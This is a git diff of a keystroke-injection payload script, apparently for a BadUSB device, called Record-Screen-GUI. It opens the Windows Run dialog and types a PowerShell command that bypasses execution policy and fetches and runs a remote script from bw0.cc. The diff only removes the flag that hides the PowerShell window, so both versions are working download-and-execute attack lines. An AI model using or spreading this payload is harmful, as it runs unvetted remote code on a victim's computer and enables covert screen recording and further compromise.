diff --git a/Record-Screen-GUI/Record-Screen-GUI.txt b/Record-Screen-GUI/Record-Screen-GUI.txt index 97dd64f..0585fa9 100644 --- a/Record-Screen-GUI/Record-Screen-GUI.txt +++ b/Record-Screen-GUI/Record-Screen-GUI.txt @@ -10,7 +10,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/rcscr) +STRING powershell -Ep Bypass -C iex (irm bw0.cc/rcscr) ENTER